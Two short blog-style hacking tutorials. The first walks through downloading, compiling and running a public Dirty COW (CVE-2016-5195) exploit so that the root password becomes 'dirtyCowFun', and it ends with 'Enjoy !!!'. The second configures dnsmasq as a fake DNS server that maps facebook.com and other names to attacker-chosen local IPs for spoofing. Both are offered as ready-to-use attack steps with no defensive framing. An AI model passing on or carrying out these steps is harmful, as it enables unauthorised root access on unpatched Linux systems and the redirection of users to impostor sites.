How to exploit Dirty Cow Vulnerability?

Dirty Cow” is a Linux local privilege escalation which affects Linux released since 2.6.22 (released in September 2007) up to  October 2016. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism.

To exploit this vulnerability  do the following steps.

  1. Download the zip file from https://github.com/gbonacini/CVE-2016-5195 .
  2. Unzip the zip file.
  3. Open terminal in this directory.
  4. type >> make clean
  5. type >> make
  6. type >> ./dcow
  7. Now your root password is “dirtyCowFun“. To verify type >> su and enter the password “dirtyCowFun“.

Screenshot is given below.dirtycow

Enjoy !!!

 

How to create fake DNS with dnsmasq in Linux?

There can be many cases where you want to make your own dns server to redirect some dns request to your site. This article will show you how to create a fake dns server or spoof dns response with a program called dnsmasq. You can install it in linux using the following command. In Kali it comes preinstalled.

  1. apt-get update
  2. apt-get install dnsmasq-base

Here 1. will update your apt-get and 2. will install dnsmasq-base.

After installing the dnsmasq edit the file /etc/dnsmasq.conf, create it if it doesn’t exit.

  1. nodhcpinterface=
  2. server=8.8.8.8
  3. nohosts
  4. addnhosts=/etc/dnsmasq.hosts

Here 1. & 2. will configure dnsmasq to use 8.8.8.8 (Google Public DNS) if no dns record is found in the /etc/dnsmasq.hosts file. /etc/dnsmasq.hosts is custom host file for dnsmasq. You can add your own host files.

Till now we haven’t created the /etc/dnsmasq.hosts file so create this file and add some dns entries as shown below.

  1. 192.168.0.1    www.router.my    router.my
  2. 192.168.0.2    www.facebook.com    facebook.com
  3. 192.168.0.3    www.mycustompageonnon80port.my

If you want an IP to point multiple site then you can give the URLs with space. And if you want to add a URL which runs on port other than 80 then, you just put IP in host file and in the browser put URL as http://www.mycustompageonnon80.portmy:1234.

Notice that some popular site like Facebook, Google etc will not be directed to these IPs as modern browser uses certificate pinning.

Now to start the dnsmasq server run the following commands.

  1. killall -g dnsmasq
  2. dnsmasq –no-daemon

Here 1. will stop dnsmasq if it is running currently and 2. will start it. –no-daemon will not send dnsmasq to background.